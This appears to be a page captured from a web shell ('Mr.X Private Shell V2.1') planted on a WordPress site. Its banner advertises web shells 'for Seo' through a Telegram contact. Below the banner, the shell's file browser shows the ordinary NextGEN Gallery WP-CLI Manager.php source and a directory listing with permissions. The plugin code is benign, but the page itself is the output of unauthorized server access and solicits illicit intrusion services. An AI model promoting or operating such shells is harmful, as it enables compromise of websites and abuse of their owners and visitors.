__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Imagely\NGG\WPCLI;
/**
* WP-CLI command manager for NextGEN Gallery.
*
* Registers and manages WP-CLI commands for NextGEN Gallery operations.
*/
class Manager {
/**
* Registers all NextGEN Gallery WP-CLI commands.
*/
public static function register() {
/**
* Add album command.
*
* @noinspection PhpUndefinedClassInspection
*/
\WP_CLI::add_command( 'ngg album', '\Imagely\NGG\WPCLI\Album' );
/**
* Add cache command.
*
* @noinspection PhpUndefinedClassInspection
*/
\WP_CLI::add_command( 'ngg cache', '\Imagely\NGG\WPCLI\Cache' );
/**
* Add gallery command.
*
* @noinspection PhpUndefinedClassInspection
*/
\WP_CLI::add_command( 'ngg gallery', '\Imagely\NGG\WPCLI\Gallery' );
/**
* Add image command.
*
* @noinspection PhpUndefinedClassInspection
*/
\WP_CLI::add_command( 'ngg image', '\Imagely\NGG\WPCLI\Image' );
/**
* Add notifications command.
*
* @noinspection PhpUndefinedClassInspection
*/
\WP_CLI::add_command( 'ngg notifications', '\Imagely\NGG\WPCLI\Notifications' );
/**
* Add settings command.
*
* @noinspection PhpUndefinedClassInspection
*/
\WP_CLI::add_command( 'ngg settings', '\Imagely\NGG\WPCLI\Settings' );
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Album.php | File | 7.08 KB | 0644 |
|
| Cache.php | File | 578 B | 0644 |
|
| Gallery.php | File | 3.83 KB | 0644 |
|
| Image.php | File | 2.05 KB | 0644 |
|
| Manager.php | File | 1.23 KB | 0644 |
|
| Notifications.php | File | 693 B | 0644 |
|
| Settings.php | File | 3.55 KB | 0644 |
|